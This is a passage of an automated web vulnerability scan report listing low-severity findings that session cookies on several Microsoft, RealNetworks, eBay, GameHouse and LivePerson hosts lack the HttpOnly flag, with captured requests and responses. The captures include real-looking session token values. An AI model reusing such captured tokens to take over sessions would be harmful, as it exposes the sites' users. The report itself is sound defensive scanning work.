The following cookies were issued by the application and do not have the HttpOnly flag set:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.NumberOfVisits=2&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; domain=microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.VisitStartDate=07/19/2011 15:27:49&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Wed, 18-Jul-2012 15:27:49 GMT; path=/
MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.2. http://investor.realnetworks.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://investor.realnetworks.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A10%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:25:10 GMT;path=/
RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:25:10 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 20:25:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A10%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:25:10 GMT;path=/
Set-Cookie: RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:25:10 GMT;path=/
Set-Cookie: RNWK_PREVIEW=;expires=Mon, 19-Jul-2010 20:25:10 GMT;path=/
Vary: Accept-Encoding
Content-Length: 25444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...

14.3. http://investor.realnetworks.com/stockquote.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://investor.realnetworks.com
Path:	/stockquote.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A27%3A35%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stockquote.cfm HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NOMOBILE=0; sifrFetch=true; RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A13%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783; RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204; __utma=123436755.2082772103.1311107120.1311107120.1311107120.1; __utmb=123436755.1.10.1311107120; __utmc=123436755; __utmz=123436755.1311107120.1.1.utmcsr=realnetworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact-us.aspx

Response

14.4. http://rac.custhelp.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://rac.custhelp.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=VC5SJgB0UnZTOwR0BAcAZw9KBz8BEgI5VysPPAQkBX9QIlY6AScMNQYlBQ8MJAh9BjEBIAIiBGwAa1ZqUlsHfFYcDGdUGFRyAwkHTVdqAVNUD1JvAEFSJVNTBDsEbgA3D2oHIgFpAmtXcw8q; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: rac.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Server: Apache
P3P: policyref="http://rac.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VC5SJgB0UnZTOwR0BAcAZw9KBz8BEgI5VysPPAQkBX9QIlY6AScMNQYlBQ8MJAh9BjEBIAIiBGwAa1ZqUlsHfFYcDGdUGFRyAwkHTVdqAVNUD1JvAEFSJVNTBDsEbgA3D2oHIgFpAmtXcw8q; path=/
RNT-Time: D=188110 t=1311107147909095
RNT-Machine: 07
Vary: Accept-Encoding
Content-Length: 22043
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xml
...[SNIP]...

14.5. http://rac.custhelp.com/app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://rac.custhelp.com
Path:	/app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=VC4FcQVxBCBVPQ9%2FAgEEYwdCDDQDEFNoVytfbFBwVC4BcwVtBiBXbg49ViwMKQNwB3dXPwAoAiEHYgcKBDgCMlN3C2kNVAJ2UDUGOQAzUXBUeQVxBTcENFUwD38CDAR4By8MfAMzUyVXa18lUA5ULQEiBWkGcVcnDmZWbwxlA1kHeldJAGACTQdzBw8EEgJvUwQLCQ1kAhJQcQZdAGlRa1RjBTIFdQQ%2FVToPfwIs; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D HTTP/1.1
Host: rac.custhelp.com
Proxy-Connection: keep-alive
Referer: http://rac.custhelp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AnhSJgx4ASUEbFIiUVJSNVUQBDwDEAE6B3sAMwYmUSsNfwVpV3ECOwUmVV8HL1MmATYBIAEhAWkCaQU5Bg8CeQtBAWpWGgEnVV9SGAY7VQcCWVJvDE0BdgQEUm1RO1JlVTAEIQNrAWgHIwAl; __utma=130296460.418147885.1311107160.1311107160.1311107160.1; __utmb=130296460.1.10.1311107160; __utmc=130296460; __utmz=130296460.1311107160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:04 GMT
Server: Apache
P3P: policyref="http://rac.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VC4FcQVxBCBVPQ9%2FAgEEYwdCDDQDEFNoVytfbFBwVC4BcwVtBiBXbg49ViwMKQNwB3dXPwAoAiEHYgcKBDgCMlN3C2kNVAJ2UDUGOQAzUXBUeQVxBTcENFUwD38CDAR4By8MfAMzUyVXa18lUA5ULQEiBWkGcVcnDmZWbwxlA1kHeldJAGACTQdzBw8EEgJvUwQLCQ1kAhJQcQZdAGlRa1RjBTIFdQQ%2FVToPfwIs; path=/
RNT-Time: D=141226 t=1311107224928263
RNT-Machine: 08
Vary: Accept-Encoding
Content-Length: 22949
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xml
...[SNIP]...

14.6. http://real.custhelp.com/app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://real.custhelp.com
Path:	/app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=VS9VIVImUXUDa1IiUToFcVA%2FUWoHFFRvC3dfbAQkAHoBcwlhUnRXbg49A3lQdVYlUSEHbwEpVnUPagMOUW1RYVZyWDoBWAN3A2pTalFgUmlVdlUvUndRbgNhUjVROgUmUAlRfgd%2BVCILaF8lBDwAdAENCS9SJVcxDnwDJlA%2BVj9RbQcJAX1WGw84Ax9RdFFfVhNYOAE3AzEDBFMuUSVSA1U5VTpSY1E2AyZSPVE%2FBSZQKQ%3D%3D; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D HTTP/1.1
Host: real.custhelp.com
Proxy-Connection: keep-alive
Referer: http://real.custhelp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=UihVIVUhVXFXP1UlUToJfVc4BD8AE1JpUCxaaQAgAHpQIgdrV3FQaQQnU1lSegZzAzQFJFZ2Bm4PZFdrUVhQKwNJCmEHSwQiUlgETgM%2FBzBSN1VUVSZVI1dXVWpROwk%2BVzIEIQBoUjtQdFp%2F; __utma=4935472.196986693.1311107154.1311107154.1311107154.1; __utmb=4935472.1.10.1311107154; __utmc=4935472; __utmz=4935472.1311107154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:53 GMT
Server: Apache
P3P: policyref="http://real.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9VIVImUXUDa1IiUToFcVA%2FUWoHFFRvC3dfbAQkAHoBcwlhUnRXbg49A3lQdVYlUSEHbwEpVnUPagMOUW1RYVZyWDoBWAN3A2pTalFgUmlVdlUvUndRbgNhUjVROgUmUAlRfgd%2BVCILaF8lBDwAdAENCS9SJVcxDnwDJlA%2BVj9RbQcJAX1WGw84Ax9RdFFfVhNYOAE3AzEDBFMuUSVSA1U5VTpSY1E2AyZSPVE%2FBSZQKQ%3D%3D; path=/
RNT-Time: D=204701 t=1311107213389208
RNT-Machine: 20
Vary: Accept-Encoding
Content-Length: 29269
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...

14.7. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQBRSSCT=FFBABKKDCAFDBFFDNEOMMCEA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=21661174&d_id=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Thu, 23 Jun 2011 11:35:46 GMT
Content-Length: 12013
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDCQBRSSCT=FFBABKKDCAFDBFFDNEOMMCEA; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 21661174
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

14.8. https://signin.ebay.com/ws/eBayISAPI.dll previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://signin.ebay.com
Path:	/ws/eBayISAPI.dll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.9. http://superpass.custhelp.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://superpass.custhelp.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=VS9RJQ15CS1VPVUlVVVULABLUWoAE1JpAn4IOwcnCHJRIwhkACYDOlV2BQ8AKFMmAzRScwIiUjoAa1JuUVhULwVPXDcMQFZwVlwGTFBtVgFVMVFSDTMJf1VVVWpVP1RjAGVRdABoUjsCJggt; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: superpass.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:44 GMT
Server: Apache
P3P: policyref="http://superpass.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9RJQ15CS1VPVUlVVVULABLUWoAE1JpAn4IOwcnCHJRIwhkACYDOlV2BQ8AKFMmAzRScwIiUjoAa1JuUVhULwVPXDcMQFZwVlwGTFBtVgFVMVFSDTMJf1VVVWpVP1RjAGVRdABoUjsCJggt; path=/
RNT-Time: D=250273 t=1311107144962595
RNT-Machine: 05
Vary: Accept-Encoding
Content-Length: 23059
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...

14.10. http://superpass.custhelp.com/app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://superpass.custhelp.com
Path:	/app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=UykEcAN3U3cDa1cnVFRWLg5FBj1RQldsUS0LOAMjVC5QIlI6AiRVbA88BH5Sd1QnVycBaVZ%2BBSZTNgUIAz9TYwMnWDoNVFMnUTlUZQEzDDlTcAR%2BAyZTbQNpVzNUMVZ1DlcGKVEoVyFRMgtxAztUIFBcUnQCdVUzD30EIVI8VD1XawEPVioFSFNkBRkDJlNdA0ZYOQ1bU2BRVFRkAXUMXVM%2FBGsDMlM0AyZXOFQ6VnUOdw%3D%3D; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D HTTP/1.1
Host: superpass.custhelp.com
Proxy-Connection: keep-alive
Referer: http://superpass.custhelp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=BX8FcQdzU3cGblQkVVUHfwNIATpQQ1ZtC3cAMw0tUigCcARoUXcNNAEiBw1WfgB1VmEGJ1V1AWkHbFFtXVRTKFEbAGsDT1ZwUlgETlZrDVoFYQUGBzlTJQYGVGtVPwcwA2YBJFA4Vj8LLwAl; __utma=152909883.1445521186.1311107156.1311107156.1311107156.1; __utmb=152909883.1.10.1311107156; __utmc=152909883; __utmz=152909883.1311107156.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:59 GMT
Server: Apache
P3P: policyref="http://superpass.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UykEcAN3U3cDa1cnVFRWLg5FBj1RQldsUS0LOAMjVC5QIlI6AiRVbA88BH5Sd1QnVycBaVZ%2BBSZTNgUIAz9TYwMnWDoNVFMnUTlUZQEzDDlTcAR%2BAyZTbQNpVzNUMVZ1DlcGKVEoVyFRMgtxAztUIFBcUnQCdVUzD30EIVI8VD1XawEPVioFSFNkBRkDJlNdA0ZYOQ1bU2BRVFRkAXUMXVM%2FBGsDMlM0AyZXOFQ6VnUOdw%3D%3D; path=/
RNT-Time: D=247214 t=1311107219688867
RNT-Machine: 18
Vary: Accept-Encoding
Content-Length: 23322
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...

14.11. https://support.discoverbing.com/LTS/default.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.discoverbing.com
Path:	/LTS/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GsfxSessionCookie=44234530295139662; domain=.microsoft.com; path=/
MC1=GUID=2ba8c043c3ce4713ae02820ed49cd1d7&HASH=2ba8&LV=20117&V=3; domain=.microsoft.com; expires=Mon, 19-Jul-2021 15:18:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.12. http://support.gamehouse.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.gamehouse.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=B30EcAZyAiZUPA9%2FBBEEYABHAjhTQF1mAHwJOgYmBX8AcgRoByEHPlBzBA5SegJ3UWYHJlNzVDxQOw0xV14GfQVPCmEHS1ZwAAoBSwo3AUUHXAQHBk8Ca1RUDzAEbgQzAGUCJ1M7XTQAJAks; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.13. http://support.gamehouse.com/app/answers/detail/a_id/861/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.gamehouse.com
Path:	/app/answers/detail/a_id/861/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=UykAdAB0ByNaMlMjABUAZAVCBz1QQwA7BHgNPgMjB30MflM7ByECOwc0VixXclEiVSUDawMrU3ADZAZ2AW5VIwcwWjoDOQJ4UTcCOVJiAiNTfgB0AGQHYFp8U28AMgBsBWQHd1A%2FAHYERQ00A2wHNAx5U2gHMwJoB3VWc1clUTJVdANzA3xTcANmBgsBPVVlByNaOANaAnZROQI9UmcCI1N%2BAHQAPwc3WjlTIwAOAHwFLQd3UGAAdgQ4DXcDXQd%2BDC9TPwdwAnIHb1ZvVz5RC1UoAx0DY1McA3cGDgEXVTgHRlpYA1QCGlFuAllSOwI4U2QANwBwBzxaNVMjAC4%3D; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/861/ HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; __qca=P0-962211929-1311107164228; cpath=site; cp_session=BH5YLFImAydWPgZ2VEFUMAFGUGoEF1RvUS1fbAUlViwGdAl1UXdRaAB6UiZQNFRwVT1UJAJgVWwBPQd5UjFVMwY0XyVQflImVmUIYAFxUTwEZFhjUjADJ1Y%2BBnZUQFQ0AWhQZwR0VDJRZ19uBXRWcwYjCWVRJlFwAHxSKFB1VDdVJVQ8AnNVCAEqByZSYlVyBnNfblA9UmpWWgguAUlRYQRLWH5SDwNGVj0GE1RdVAABS1BtBANUbVFuXzEFZlZ3BmsJPVF3US8%3D; __utma=30093501.1002048789.1311107164.1311107164.1311107164.1; __utmb=30093501.3.10.1311107164; __utmc=30093501; __utmz=30093501.1311107164.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107252636%7C1468787252636%3B%20s_invisit%3Dtrue%7C1311109052639%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3Drealgamehousedev%253D%252526pid%25253DSupport%2525253A%25252520Home%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.gamehouse.com/app/answers/detail/a_id/861/%252526ot%25253DA%3B

Response

14.14. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.gamehouse.com
Path:	/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=VS9YLAx4ACRSOgR0ARQIbFUSVmxTQFFqUCwLOFd3USsNfwZuUXcGP1dnVC4MKQd0VCRQOFV9CCsBZlcnBGsGCQQgDmcEPgBuVysAP1FnBjFVdlgiDCkAN1I4BG4Bfgg%2FVWNWMFMkUVhQegtxVzZRZg0pBmFRNAZoVzNUIAwxB1pUJFBFVWcIZAFgVyAEYwZiBGsOJQR1ACNXYgB6UXcGKVV2WEkMagBrUmUEcwFgCDlVOFZ3U3VRcFAzCyBXd1FaDXEGLVE0BlpXP1RmDCkHO1QkUDpVMAg4ASdXeAR9BnAEZw50BDwAdFdbACZRJgZgVSdYfQxiAGlSbgQKAX0IRVViVkpTdlFfUBULalcSUV0NCAZBUToGV1c7VDsMPQdgVHFQP1U7CCsBeA%3D%3D; path=/

